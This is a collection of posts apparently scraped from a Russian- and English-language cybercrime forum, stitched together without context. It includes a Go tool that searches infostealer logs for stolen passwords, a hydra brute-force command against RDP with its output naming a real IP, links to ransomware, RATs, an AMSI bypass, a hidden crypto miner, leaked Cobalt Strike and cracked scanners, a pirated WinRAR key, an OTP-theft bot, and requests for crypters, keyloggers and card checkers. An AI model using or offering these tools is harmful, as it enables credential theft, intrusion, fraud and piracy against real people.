Photon ransomware source code. Works on GNU/Linux systems.
(youtube-dl, 4k video downloader) downloads are of slight low quality as compared with playback on youtube
recommend a downloader that does not decrease the video quality
Written for Windows. Requires go compiler which can be downloaded as installer https://go.dev/dl/go1.20.4.windows-amd64.msi or from source https://go.dev/dl/go1.20.4.src.tar.gz. Add 'go' to environment variables and compile using 'go build filename.go', launch using './filename.exe'. This is the most current version of the program I wrote and shared in the 'Underground' Logs thread, except I removed the user defined filename input and replaced it with a slice of all the different stealer naming schemas I could find to make things simpler. Also fixed a problem with the buffer that was preventing real-time match displays to the terminal and to output. If anybody wants to suggest a different feature let me know in the comments and if it's reasonable I will include it.
C-like:Copy to clipboard
package main
import (
"bufio"
"fmt"
"io/ioutil"
"log"
"os"
"path/filepath"
"regexp"
"strings"
)
func main() {
var searchPaths []string
for {
var searchPath string
fmt.Print("Search Filepaths: ")
fmt.Scan(&searchPath)
searchPaths = append(searchPaths, searchPath)
fmt.Print("Add another search path? (y/n): ")
var response string
fmt.Scan(&response)
if strings.ToLower(response) != "y" {
break
}
}
fileNames := []string{"passwords.txt", "passwordslist.txt", "_allpasswords_list.txt", "_filepasswords.txt", "[edge_default]_passwords.txt"}
var searchString string
fmt.Print("Enter a search string or URL: ")
fmt.Scan(&searchString)
var outputFilePath string
fmt.Print("Save results to: ")
fmt.Scan(&outputFilePath)
outputFile, err := os.Create(outputFilePath)
if err != nil {
log.Fatal(err)
}
defer outputFile.Close()
outputWriter := bufio.NewWriter(outputFile)
searchRegexp := regexp.MustCompile(searchString)
var matchCount int
for _, searchPath := range searchPaths {
err := filepath.Walk(searchPath, func(path string, info os.FileInfo, err error) error {
if isExcluded(path) {
if info.IsDir() {
return filepath.SkipDir
}
return nil
}
for _, filename := range fileNames {
if info.Name() == filename {
fileMatchCount := 0
fileContents, err := ioutil.ReadFile(path)
if err != nil {
log.Println(err)
return nil
}
scanner := bufio.NewScanner(strings.NewReader(string(fileContents)))
for scanner.Scan() {
if searchRegexp.MatchString(scanner.Text()) {
matchCount++
fileMatchCount++
outputWriter.WriteString(scanner.Text() + "\n")
for i := 0; i < 2; i++ {
if scanner. Scan() {
outputWriter.WriteString(scanner. Text() + "\n")
}
}
}
}
if err := scanner. Err(); err != nil {
.log. Println(err)
}
if fileMatchCount > 0 {
fmt. Printf("Found %d matches in %s\n", fileMatchCount, path)
}
}
}
return nil
})
if err != nil {
.log. Println(err)
}
}
err = outputWriter.Flush()
if err != nil {
.log. Fatal(err)
}
fmt. Printf("Found a total of %d matches\n", matchCount)
}
func isExcluded(path string) bool {
excludedDirectories := []string{
"\\AppData\\",
"\\Program Files\\",
"\\Program Files (x86)\\",
"\\Windows\\",
"\\Page File",
"\\System Volume Information\\",
"\\WinSxS\\",
"\\D3Dscache",
"\\Riot Games\\Riot Client\\Logs\\",
}
for _, directory := range excludedDirectories {
if strings. Contains(path, directory) {
return true
}
}
return false
}
Купил себе софт, пробовал работать с логами, но чето не понял прикола этого всего, как на нем можно заработать? На сколько я понял нормальных логов никто не скинет и толку от этого нет)
Ищу человека который сможет грамматно настроить эмулятор андроид и запустить нужные мне приложения - подмена локации - подмена параметров - скрытие рута - добавление компанентов гугла . Писать в телегу agueera - оплата 10 000 usd
Credits goes to Pwn3rzs
Windows :
[ https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240514098-Windows- Pwn3rzs-CyberArsenal.rar ](https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240514098-Windows- Pwn3rzs-CyberArsenal.rar)
Linux :
[ https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240514098-Linux- Pwn3rzs-CyberArsenal.7z ](https://ponies.cloud/scanner_web/acunetix/Acunetix-v24.4.240514098-Linux- Pwn3rzs-CyberArsenal.7z)
Release Notes :
Release build 24.4.240514098 includes multiple engine improvements, new security checks, and updates to several existing security checks.
![www.acunetix.com](/proxy.php?image=https%3A%2F%2Fwww.acunetix.com%2Fwp- content%2Fthemes%2Facunetix%2Fico%2Fchrome-touch- icon-196x196.png&hash=30a0fb203c3dbd0416c5555a5f4433b4&return_error=1) www.acunetix.com
Password : Pwn3rzs
Здравствуйте. Не могли бы вы посоветовать хороший инструмент для перевода документов (изображений, отсканированных документов)? Я хотел бы получить максимально анонимный инструмент. Я не очень хочу загружать свои файлы на случайные сайты.
**
**
Login Details
**
Username = admin
Password = Dr.FarFar**Click to expand...
**
Software License : Professional Edition
Version : 6.137.2403.2916
Filename : SmartPhone Forensic System Professional v6.137.2403.2916 Full
Activated.zip
Size : 9.7 MB - 6.6 GB**
https://www.up-4ever.net/jvqmhlcwxdsl
I need good java rat or crypter old or new
Hello guys,
I've come across this tool that FireEye's FLARE team is using to detect the
capabilities of an executable to know if it's malicious.
Sounded pretty cool, and it's open source.
Works pretty well, interesting for some research and to check some files for
your own environment's safety.
Check it out.
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F272815213%2F23e03180-c5b1-11ea-9f21-52262b4a6b33&hash=c0c54dd3eba253c24082f860cd1673dc&return_error=1)
capabilities in executable files. ](https://github.com/fireeye/capa)
The FLARE team's open-source tool to identify capabilities in executable files. - mandiant/capa
github.com
![www.fireeye.com](/proxy.php?image=https%3A%2F%2Fwww.fireeye.com%2Fblog%2Fthreat- research%2F2020%2F07%2Fcapa-automatically-identify-malware- capabilities.html%2F&hash=6fc80e3c1f2413ae5822e595fc0b8ada&return_error=1) www.fireeye.com
Hope you find it useful.
Best.
Всем привет, есть ли бесплатный\крякнутый рат с сервером для линукса?
Создаём файл rarreg.key и наполняем содержимым, вставляем в папку с винраром - всё готово.
Code:Copy to clipboard
RAR registration data
Federal Agency for Education
1000000 PC usage license
UID=b621cca9a84bc5deffbf
6412612250ffbf533df6db2dfe8ccc3aae5362c06d54762105357d
5e3b1489e751c76bf6e0640001014be50a52303fed29664b074145
7e567d04159ad8defc3fb6edf32831fd1966f72c21c0c53c02fbbb
2f91cfca671d9c482b11b8ac3281cb21378e85606494da349941fa
e9ee328f12dc73e90b6356b921fbfb8522d6562a6a4b97e8ef6c9f
fb866be1e3826b5aa126a4d2bfe9336ad63003fc0e71c307fc2c60
64416495d4c55a0cc82d402110498da970812063934815d81470829275
Нашёл в логах, сейчас посмотрел что есть и в гугле, но думаю проще будет так, чем сначала искать, потом проверять - тут сделал и готово, без лишней ебли.
Free otp bot
calling US/GB
For any help tg: sonxyz
otp bot tg :@Sonxyz_otp_bot
Hi guys could someone help from where to buy hacking tools (like ransomware, rats ) latest versions thank you so much !
Нужен срочно чекер one drive с парсом по ключевым словам
Run as Administrator Crack file for set Read-only license_info.json.
Hidden content for authorized users.
Password: xss.is [/ HIDE]
This is just crack file, If you need to setup file, Please tell me I will send link download.
[POSTS = 4] https://mega.nz/file/1gMyVZza#9aqTYl3OXqNMuBGpuiRxUWbnXY0-YUn5jiYzeuNLuck [/ POSTS]
Update 2.7.2
-Заменили сервис Indeed на eBay (все страны), проверяет кол-во ордеров и отзывы
-Исправили чек YouTube
-Исправили чек TikTok, также добавили чек TikTok ADS.
-Добавили чек Reddit ADS
-Добавили чек Hypixel в Minecraft, также на Skins,Capes.
-Добавили получение текста и заголовка писем Gmail,Yahoo,Outlook
-Исправили LinkedIn
-Добавили проверку на баланс "В ожидании", исправили конвертацию баланса стима (иногда неверно парсил баланс)
-Добавили поддержку стиллера DCRat для утилит и Cookies чекера.
-Переработали CreditCards Searcher, добавили парсинг CVV если есть.
-Вернули сортер логов для Steam,Telegram,Wallets,FTP
Всех форумчан с наступающим!
у меня вопрос.
С помощью hydra брутил vnc, все работает не спеша. Появилась необходимость
побрутить rdp и столкнулся с тем, что сбручивает не верные результаты,
поставил самые минимальные потоки, все через прокси-тор, но пробрутив от 1к до
6к выдает неверные данные. Кто сталкивался подскажите в чем может быть
проблема.
запускаю:
sudo proxychains4 hydra -s 3389 -V -L /home/kali/Desktop/ssh-
L-P/Administrator.txt -P /home/kali/Desktop/ssh-L-P/rockyou.txt -t 4 -w 30 -F
127.31.---.-- rdp
спустя какое-то время выдает результат:
[ATTEMPT] target 23.31.--.--- - login "Administrator" - pass "playgurl" -
5029 of 143444 [child 0] (0/1)
[proxychains] Round Robin chain ... 127.0.0.1:9050 ... 23.31.---.---:3389 ...
OK
[ATTEMPT] target 23.31.--.--- - login "Administrator" - pass "planet" - 5030
of 143444 [child 0] (0/1)
[proxychains] Round Robin chain ... 127.0.0.1:9050 ... 23.31.---.---:3389 ...
OK
[ATTEMPT] target 23.31.--.--- - login "Administrator" - pass "june13" - 5031
of 143444 [child 0] (0/1)
[proxychains] Round Robin chain ... 127.0.0.1:9050 ... 23.31.---.---:3389 ...
OK
[3389][rdp] host: 23.31.--.--- login: Administrator password: june13
[STATUS] attack finished for 23.31.22.114 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-29
06:08:11
на деле результат не валидный.
hello people
which email checkers have you used that produce good results on a list of logs?
i am happy to pay if the service is really good and reliable.
This project was developed for the Computer Security course at my academic degree. Basically, it will encrypt your files in background using AES-256-CTR, a strong encryption algorithm, using RSA-4096 to secure the exchange with the server, optionally using the Tor SOCKS5 Proxy. The base functionality is what you see in the famous ransomware Cryptolocker.
The project is composed by three parts, the server, the malware and the unlocker.
The server store the victim's identification key along with the encryption key used by the malware.
The malware encrypt with a RSA-4096 (RSA-OAEP-4096 + SHA256) public key any payload before send then to the server. This approach with the optional Tor Proxy and a .onion domain allow you to hide almost completely your server.
Click to expand...
(Academic). Now Ransom:Win32/MauriCrypt.MK!MTB ](https://github.com/mauri870/ransomware)
A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB
github.com
Устанавливаем:
https://trashbox.ru/files20/1334423_0ae547/com.idamob.tinkoff.android_5.7.1_2074.apk
Номер для приема смс и данные вводишь на шару!
Если пофиксили на шару, берём отсюда:
1. Открываем сайт реестра залогов. <https://www.reestr-
zalogov.ru/search/index>
[http://rutordeepkpafpudl22pbbhzm4ll...poluchit-status-qiwi-koshelka-
osnovnoj.20343/](http://rutordeepkpafpudl22pbbhzm4llbgncunvgcc66kax55sc4mp4kxcid.onion/threads/kak-
poluchit-status-qiwi-koshelka-osnovnoj.20343/)
Пропускаешь доставку карты и пополняешь на любую сумму
Дальше можете налить по qr коду через смартфон поднося к банкомату!
**Не плохой ратник с открытым исходным кодом, при тестировании показал себя весьма не плохо, учитывая то что управление осуществляется через веб морду
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F473922603%2Ffca32e2c-9a0b-4a54-b96c-16697fc1bc37&hash=48d93edcef78122eccd3d2c4077d534f&return_error=1)
ANDROID BOTNET | ANDROID RAT | EASY TO USE | EASY TO CONTROL | WITHOUT ROOT | REMOTELY CONTROL ANDROID 2022 - BotolMehedi/BDROID
github.com
**
SocTool - это софт для работы с Instagram что напичкан разными фишками. Это я
в кратце сделал описание а остальное уже можно прочитать на официальном сайте.
В общем есть барыги в сети (к примеру fraddyrad, он же матрица ) которым крякают софт а они вешают на него протектор и пепепродают с привязкой к железу (для тех кто не в курсе это софт для упаковки, привязки к железу программ с многими настройками).
Так вот Вам генератор ключей на подобный софт:
Активировать программу просто
:
Установили программу, запустили, появиться форма активации, использовать
KeyGen.
https://d.radikal.ru/d17/2109/4f/a885d71a55e5.gif
You must have at least 30 reaction(s) to view the content.
Hello Russian friends, I want to leak the latest jar package of cobaltstrike on the xss forum. This software is only for local testing, and more data will be leaked in the future. have fun
Bash:Copy to clipboard
shasum -a 256 cobaltstrike.jar
https://www.virustotal.com/gui/file/c1cda82b39fda2f77c811f42a7a55987adf37e06a522ed6f28900d77bbd4409f
The directory structure after decompiling the jar package
Netsparker 6.1.0.31760
Download - https://mega.nz/file/RPhhgYzB#0YnPpVEKJA6FAXBs_iRuPiLDiRxBgaygtcfCSb8N2K4
Cracked By : https://t.me/Shiny_Fox
virustotal - https://www.virustotal.com/gui/file...be8dd47da86d1c53d607de6a10d77ce9b9f/detection
выдает ошибку при подключении к серверу
Собрал словарь паролей, мне нужно сделать подсчет количества совпадений в каждом отдельном словаре. Я использую для этих целей DBeaver и такой скрипт
select
pass
,count(pass) as СОВПАДЕНИЯ
from
BASE1
group by
pass
order by СОВПАДЕНИЯ desc
Методом проб выяснилось, что около 700к строк он обрабатывает и выводит данные
в нужном формате:
которые экспортируются в
таблицу например(для удобства).
Если количество строк большее, мне выдает ошибку:
Если разбить нужный файл на меньшие куски,все посчитается,но как же тогда
склеить результаты? Ведь нужно узнать количество совпадений во всем файле.
Может решение простое,я не смог его найти. Сначала я подумал что проблема в
нехватке оперативной памяти,но DBeaver потребляет что-то около 2Гигов и не
более. В системе стоит 16Гигов. Пробовал на 32Гигах, результат тот-же.
Возможно где-то стоит ограничение на количество входных данных,я не смог найти
где это ограничение и есть ли он, гугл так же не помог.
Если есть более простое решение, подскажите пожалуйста, ИИ выдал скрипт на
питоне,который крашится видимо из-за спецсимволов,тут же я экранирую
проблемные ковычки и все работает как надо.
Максимальный файл имеет 5 миллионов строк, от 5 до 15 символов,включая
спецсимволы.
Есть ли какой-то паблик чекер для корп/обычных почт кроме mailcheckerplus и AIOC?
Preview : https://a.pomf.cat/xtnkoa.gif
Download :
https://www.mirrored.to/files/1UAW50VS/violett.zip_links
FEATURES :
- Extracts (pass parase, private key, passwords, wallet, address) from logs,
- Supports any logs
- Auto balance checker
- Supports all the networks
- Extracts pass phrase to txt file
- Fast & quick response
- No proxies needed
Jex Bot инструмент для автоматического сканирования и автоматического
эксплойта #Leaked
Ссылка: https://github.com/ghostsec420/JexBotv4
Прочитайте файл Readme.md перед установкой
и исходный код
Счастливого взлома!
Jex Bot a auto scanner and auto exploiter Tool #Leaked
Link: https://github.com/ghostsec420/JexBotv4
Read the Readme.md file before installing
and the source code
Happy Hacking!
Софтина быстро пробегается по папке с логами и очищает логи от малварей
Spoiler: скрин проги
Spoiler: расширения для проги
.com .bat .exe .lnk .dot .docm .dotx .dotm .wps .odt .ott .sxw .fodt .xml .uot .uof .hwp .lwp .wpd .scr .js .jse .msi .wsf .ps1 .hta .app .gadget .sys .src .msu .cgi .vb .dll .xlsm .pptm .bin .sh .xlsx
Spoiler: линки
Исходники:https://github.com/WutADude/VerySimpleLogsCleaner
Скачать: https://github.com/WutADude/VerySimpleLogsCleaner/releases
VT:
https://www.virustotal.com/gui/file...07f6ad65cf7f10cfd112f7ac0c6d113d5b4/detection
Какие есть проги для брута акков по базам?
Находил некоторые, но они как-то странно работают...
Hidden content for authorized users.
](https://anonfiles.com/w8baUam3z3/Proxy_Checker_1njector_rar)
anonfiles.com
Всем привет! Очень нуждаюсь в этом софте и знаю людей которым он тоже нужен, кто нибудь знает где достать такое и сколько мне примерно обойдется такое удовольствие?
Общался со знакомым, сказал, что стоит такое чудо около 3к$, хотелось бы узнать, на сколько это правда и где вообще его достать?)
Due to the loss of relevance of the methods after a large-scale update of the cf, it was decided to share it with you.
UPD: Buyers who have purchased the methods will receive updated versions after completion of the work.
Link - https://dropmefiles.com/vtpA6
VT -
youk
Выкладываю грабберы, которыми пользуюсь сам.
обращаю внимание они НЕ ПРОВЕРЕНЫ НА СКЛЕЙКИ.
так что юзать ТОЛЬКО на ВИРТУАЛКЕ
Но софт рабочий, после чека остается около 10-12к рабочих прокси. Удачи
скачать : ТЫК
пароль :
You must have at least 15 message(s) to view the content.
Подскажите софт под винду или методу распределить нагрузку на цпу из сетки
серверов. К примеру есть серв 1 с цпу 4 ядра и серв 2 с цпу 8 ядер. Рабочий
софт хостится на серв 1 но нужно сделать так чтобы он софт мог подтянуть
мощности серва 2. В результате получить 12 ядер под рачие процессы для одного
софта.
Сетка-каналы очень шустрые. Чем можно раскидать нагрузку? Может чтото из
области майнинга? Желателььно гуи где б указал путь в ехе нужной проги для
распред нагрузки, ипы на сервера и все.
скрипт - выбираете txt файл с сидками. Проверяет валидность сид фразы и
создает 2 файла (ETH.txt и check.txt)
ETH.txt - адреса
check.txt - сидфраза, приват кей, адрес
Spoiler: вид
pip install -r requirements.txt
You must have at least 2 message(s) to view the content.
Hello, I'm leaking the source code from:
Electronic Information System ([SEI](https://rfmirror.com/misc.php?action=safelinks&url=https%3A%2F%2Fwww.gov.br%2Fanp%2Fen%2Frounds- anp%2Fbidding-rounds%2F17th-bidding-round%2Felectronic-information-system-sei) 3.1.5)
Permissions System (SIP 2.1.5)
Used in lots of gov institutions from Brazil, make good use of it .
7za l command: https://bayfiles.com/R8Jaz7Qcu2/a_txt
Download:
You must have at least 50 reaction(s) to view the content.
Hey, looking for Metasploit2 pro by rapid7
PM for negotiation.
Использую старую версию ратника Craxs и при создании билда сразу дает ГПЗ (гугл плей защита), кто знает как пофиксить??
Hello sister and brother
](https://www.virustotal.com/gui/file/b9398cbd4a632e5bc484851937744f10227bd878605d0760949b573741137c22)
VirusTotal
www.virustotal.com
Log Based:
services.txt
English:
ussian:
OPEN SORTERX .EXE
]]
GGood luck brother and sister
much more better than crystal and all other
You must have at least 0 message(s) to view the content.
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
](https://gofile.io/d/ueSKBm)
Gofile is a free, secure file sharing and storage platform. With unlimited bandwidth and storage, you can easily store and share files of any type without any limits. Our advanced features, such as CDN support and password protection, make Gofile the ideal choice for individuals and businesses...
gofile.io
Ищу софты под iOS, установлен jailbreak.
В приоритете приложения для работы с сетями(снифф трафика, сканнер сети и
т.д.)
Прошу давать ссылки на доверенные источники
CS: https://github.com/theanonhackuk/cspro
AL: https://github.com/kyleavery/AceLdr
Hoping to be useful.
Developed by me and my team, many developers are looking for this kind of software, so the valued members of xss.is will benefit.
You must have at least 50 reaction(s) to view the content.
Click to expand...
Всем привет, собственно шапка, нужен сервис\нейронка по созданию фотки сс по запросу, чёт погуглил, либо мусор либо уже не работает, нейронкам видимо запретили, не хотят хавать запрос, пишут противоречит нашей политике. Помогите пожалуйста!
Приветствую, нужен софт для андроид, который будет делать скрины каждый определённый промежуток времени и писал звук, если телефон отключен от интернета, естественно чтобы это было не видно, мб кто то из мемберов знает подобный софт, или готов взяться за реализацию?
Burp Suite Professional 2021.7.1 + Crack
Что нового:
DOM Invader improvements
- DOM Invader has a new option to automatically add the canary to all sources. This saves you time and means that you can discover vulnerabilities by just browsing through a site. The option is off by default; you can turn it on from the DOM Invader settings.
- You can now discover parameters that use the URLSearchParams API. Sites use this API to extract client-side parameters from URLs, and DOM Invader can now expose more attack surface when these parameters appear in a sink.
Scanner speed increase
Based on user feedback and our own analysis, we have changed Burp Scanner's default settings to speed up scans without compromising coverage.
Message inspector UI change
A message inspector UI change we made in 2021.7 was causing problems, so we reverted it. You can once again edit names and values in-line in the message inspector by double clicking a field. You can also select a single field with a single click, or multiple fields with a single click and drag.
Bug fix
We fixed a bug where the innerText setter was not being called correctly in DOM Invader.
Click to expand...
Скачать:
Hidden content for authorized users.
](https://dropmefiles.net/ru/mEZTGHhsy4)
Вы можете быстро делиться фотографиями, отправлять видео или передавать файлы большого размера (до 100 Гбайт). Загружайте файлы без регистрации, скорость загрузки и скачивания файлов не ограничена.
dropmefiles.net
Всем привет видел где-то когда-то на гитхабе бота для tg через него можно хеши на Брут закрывать в хешкат , просто очень часто просят чекнуть хеш так как имею неплохие мощности , но каждый раз заходить на сервак кифалом ткните носом если кто в курсе где это добро взять . С меня как обычно лукас .
Ищу криптора, который криптует апк билды
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F195ff78a989bd571977a0c0fd4b572c2240c5a6924567b6033f170f2938ccdbe%2FEvilBytecode%2FLifetime- AmsiBypass&hash=f13734abe1c4cedb517c4534b4af1bee&return_error=1)
](https://github.com/EvilBytecode/Lifetime-AmsiBypass)
Lifetime AMSI bypass. Contribute to EvilBytecode/Lifetime-AmsiBypass development by creating an account on GitHub.
github.com
we cant execute "Invoke-Mimikatz"
now we execute "Invoke-Mimikatz"
История Acunetix Premium
November 2021
Лицензия на программное обеспечение: Premium Edition
Версия: 14.5.211115146
Цена: 2,5 миллиона долларов
Скидка: 100% OFF
Имя файла: Acunetix Premium v14.5.211115146 Полная активация - WwW.Dr-
FarFar.CoM.zip
Размер: 179.5 MB
Source : Dr.FarFar
Run only under VM and do not test his builds on your own.
link:
https://mega.nz/file/PENTwBTZ#gSEkkB6aNj3vSkbJzV8VA1Fsa5ILy0hcNLwx0WVUqNM
pas: xss.is
тоже взято за бугром
Today I've provided Bin checker script which i personally coded for myself for testing purposes!
Now I've provided it to you ^_^
INSTRUCTIONS TO CONFIGURE THIS :
1. OPEN FOLDER & UPLOAD SQL FILE TO PHPMYADMIN
2. OPEN INDEX.PHP & PUT YOUR DATABASE CREDENTIALS
3. CHANGE TABLE NAME TO YOUR TABLE NAME IN LINE "bin_table"
DOWNLOAD SCRIPT + SQL HERE :
You must spend at least 360 day(s) on the forum to view the content.
HMC v2.0 Mail Access Checker 2022 new tool for Email and Webmail checking.
Fast and responsive.
How to use?
Pass: crax
Load base then proxy
Then start! Simple
Hidden content for authorized users.
Mirrorcreator - Upload files to multiple hosts ](https://www.mirrored.to/files/DHEXQWKI/HackUs_Mail_Access_Checker__%5BCraxpro.io%5D.rar_links)
Securely upload your files, media and documents to more than 30 cloud storage providers simultaneosuly. Remote Upload files to Google Drive and many other hosts.
www.mirrored.to
](https://github.com/UnamSanctam/SilentCryptoMiner)
A Silent (Hidden) Free Crypto Miner Builder - Supports ETC, RVN, XMR, RTM and much more. - UnamSanctam/SilentCryptoMiner
github.com
Бесшумный (скрытый) собственный майнер криптовалюты, способный добывать ETH, ETC, XMR, RTM и многое другое, со многими функциями, подходящими для тихого майнинга.
Незнаю на сколько хорош данный Майнер увидел у H0nus решил поделиться вдруг кому пригодиться .
IDA 7.7 думаю все понятно. На все ОС.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/FN0lXKAT#e5PPW6r_vL34nXpm7iptW1nmBZafKiSaRkyvubzUI5k)
mega.nz
Всем доброго здравия!
Не знаю, слишком ли примиивна эта тема, но не могу разобраться, в какую
сторону смотреть, чтоб реализовать чекер CC без создания своего мерча и тому
подобных махинаций. Возникла мысль перехватывать запросы при привязке карты к
сервиску/магазину и формировать свои, используя токен сервиса и прочие детали.
Но, все сервисы по разному реализуют работу с Gate'ом, и пока ничего толкового
не выходит. Я в правильном направлении смотрю или это нереализуемая затея и
нужны другие варианты?
Доброго времени суток! Нужен рекламный софт, который будет способен
потенциально привлекать миллионы посещений на сайт/ресурс по крипто
тематике со следующий сетей:
Twitter (X)
Reddit
Facebook
LinkedIn
Discord
С предложениями писать в ПМ.
Привет. Никак немогу найти что-то толковое. Подскажите или намекните чем воспользоватьсяё в открытых источниках!! Суть проблемы: у чела на удаленном корп.компе важная мне дата(логины пасы линки итд) я ему зарядил кейлогер и скринграббер, а он чорт всё тащит с своего домашнего компа - т.е. сидит он в корп. впн сети из дома. Как сграбить буфер обмена??!! у меня шелл доступ, работает он в хроме и лисе. Плиииззззз хелп ми
We are in 2020 and this software is non crackable! anyone got a crack for it? https:// www. avanset. com/vce-simulator.html
You must have at least 77 reaction(s) to view the content.
вот такой вот плагин
пруф работы:
p.s mrroot это я
Ищу чекер который имеел функционал :проверяет валид хостинга - вытаскивает
домены привязанные к хостингу и чекать их посещения , может + географию этих
посещений , более ничего не требуется.
цена от 100$
В папке больше 14 миллионов файлов, не могу сообразить, как разбить на 140 директорий по 100 тысяч файлов.
Желательно не Юниксовское решение кто-то может подсказать,?
Гуглом так сразу и не нашел
Мелкими шагами изучаю GO, буду делиться написанным софтом по мере изучения.
Spoiler: Запуск
Если не хватает прав - chmod +x ./port
Для старта программы - ./port
Spoiler: Исходный код
Code:Copy to clipboard
package main
import (
"fmt"
"net"
"time"
)
func scanPort() {
var ip string
fmt.Print("Enter the address: ")
fmt.Scanf("%s\n", &ip)
var first int
fmt.Print("Start port: ")
fmt.Scanf("%d", &first)
var last int
fmt.Print("Last port: ")
fmt.Scanf("%d", &last)
for i := first; i <= last; i++ {
time.Sleep(5 * time.Millisecond)
go func(j int) {
address := fmt.Sprintf("%s:%d", ip, j)
timeout := net.Dialer{Timeout: 3*time.Second}
conn, err := timeout.Dial("tcp", address)
if err != nil {
return
}
conn.Close()
text := fmt.Sprintf("%s:%d -> open", ip, j)
fmt.Println(text)
}(i)
}
func main() {
scanPort()
}
Ищу данный софт, версия не важно, но желательно более поновее, буду очень благодарен! (Нужен именно UFED)
Hello guys, this is such an amazing tool with amazing name ? Privacy is sexy, so basically what this tool does it generates scripts for you to disable telemetry on Windows/MacOS
Enforce privacy & security best-practices on Windows and macOS, because privacy is sexy ??
Click to expand...
there's two options, you can download and run binary from github
privacy & security best-practices on Windows, macOS and Linux, because privacy is sexy ](https://github.com/undergroundwires/privacy.sexy)
Open-source tool to enforce privacy & security best-practices on Windows, macOS and Linux, because privacy is sexy - undergroundwires/privacy.sexy
github.com
or just visit their website and select which scripts you need
__
](https://privacy.sexy/)
Discover privacy.sexy, the privacy tool to maximize your privacy and security on Windows, macOS, and Linux. Easily use best practices to prevent tracking and make your life secure and private — because privacy is sexy.
privacy.sexy
Every line of generated scripts is commented, so you can read it to understand what is tool gonna change.
Enjoy your privacy ??
CLI valid cookie checker selenium-based.
Required Versions:
ChromeDriver - 114 (Win32)
Google Chrome Version - 114
For later google chrome and chromedriver versions
there are stables from 117-120
](https://sites.google.com/chromium.org/driver/downloads)
Current Releases If you are using Chrome version 115 or newer, please consult the Chrome for Testing availability dashboard. This page provides convenient JSON endpoints for specific ChromeDriver version downloading. For older versions of Chrome, please see below for the version of ChromeDriver
sites.google.com
Source:
You can add more sites(cookies) with your request on line 21 and line 87.
You must have at least 10 reaction(s) to view the content.
Added GUI:
You must have at least 10 reaction(s) to view the content.
Привет бандиты, есть у кого софт на подобии Kickidler или ActivTrak ?
Shellter Pro 3.5
Code:Copy to clipboard
Download - https://google-storage.com/vtsample/758441816565-rcd/f300ddc1e5c2e6b201e02be39c59be0d053117a145053ef5db3fc6da7d5417e5/ShellterPro_v3.5.zip
VT Scan - https://www.virustotal.com/gui/file/f300ddc1e5c2e6b201e02be39c59be0d053117a145053ef5db3fc6da7d5417e5
Приветствую. Может, кто-нибудь поделится чекером WHM. Имеется скрипт, работает хорошо только при https. При http кидает в гуды не валид
_ПО для расшифровки криптовалютных кошельков, написанное на языкеC# .NET** _**
Spoiler: Предыстория
Я решил сделать проект, который мог бы заинтересовать как меня, так и людей, знающих, для чего он нужен. Я заметил, что большая часть проектов связанных с криптовалютой являются платными, поэтому я захотел попробовать сделать что-то, что мог бы переделывать для себя и дополнять любой разработчик, который хотел бы себя попробовать в этой сфере. C# это не мой язык программирования, этот проект результат исследований работы и структуры криптовалюты как таковой, поэтому если у вас что-то не запускается, не работает, ломается, просьба написать об этом в теме. Спасибо
Spoiler: Принцип работы
Решил описать принцип работы программы, чтобы было проще понимать, с чем имеет дело рядовой пользователь. Сначала производится получение всех директорий в указанной пользователем при запуске папке, после чего в них выполняется поиск .ldb, .log файлов. В каждой директории, где они есть, выполняется поиск файла с паролями рекурсивно (то есть в каждой папке и подпапке лога). После этого происходит попытка расшифровки файла, если успешно, то в консоли можно будет увидеть в поле MSG сообщение в виде "Success..." и подобранным паролем. Результаты сохраняются как и в один файл (для приватных ключей и для фраз), так и по категориям криптовалютных кошельков, которые поддерживает парсер. Парсинг производится НЕ ПО РЕГУЛЯРНЫМ ВЫРАЖЕНИЯМ (речь именно за приватные ключи и фразы), а именно по структуре данных кошелька. То есть если кошелёк поддерживается, то ищутся аккаунты, категории аккаунтов, ключи, специальные ключи и типы найденных данных в структуре кошелька
Spoiler: Зависимости
Для компиляции и запуска программы требуется установить .NET 7.0.x Runtime. Вы можете скачать его на сайте [Microsoft](https://dotnet.microsoft.com/en- us/download/dotnet/7.0)
UPD: проверено на SDK 7.0.x, работает. Если используете более старую версию,
то могут быть ошибки в работе
UPD2: проверено на системах основанных на Windows 7 (SP1) и выше, а так же
Linux
Spoiler: Инструкция
1. Прежде всего, скомпилируйте и запустите или запустите скомпилированную
программу
2. Скопируйте и вставьте путь к папке, где содержатся криптовалютные
кошельки
3. Дождитесь результатов в каталоге программы (папка results)
Spoiler: Ссылки
Ссылка на Telegram-канал проекта: https://t.me/multitale
Ссылка на Github проект: https://github.com/cryingincradles/Multitale
Ссылка на актуальный релиз:
https://github.com/cryingincradles/Multitale/releases/tag/v0.4.0-alpha
Spoiler: P.S.
Программа рассчитана на модульную систему, где помимо расшифрования будет куча разных других модулей, которые я буду делать, когда позволяет моя лень, включая получение баланса каждого кошелька ПОТИПНО (используя кучу бесплатных ресурсов, которые пытаются продавать)
Всем привет! Ищу софт или скрипт для брута instagram. Качал с гитхаба, в основном все нерабочее. Может у кого-то скрипт или софт завалялся, или прямая ссылка есть на гитхаб, только на рабочее.
Заметил сообщение от sushifriends74 вПредложениях по улучшению форума:
Click to expand...
Подумал, что мне тоже интересно читать старые треды, поэтому сделал расширение
TOR/Firefox для поиска рандомной статьи до 2015 года.
Мое первое расширение, сделанное в 4 утра, не будьте жестокими. Добавляется
через Debug/Temporary extensions (инструкция на картинке ниже). При нормальном
добавлении пишет "This add-on could not be installed because it appears to be
corrupt", почитал, пишут что надо его подписать для возможности добавить
нормально. Мне лень, кому не лень и нужно - можете сделать =).
Spoiler: Установка | Installation
1. Перейти в браузере на about:debugging#/runtime/this-firefox
2. Нажать "Load Temporary Add-on" и выбрать прикрепленный к этому треду .xpi
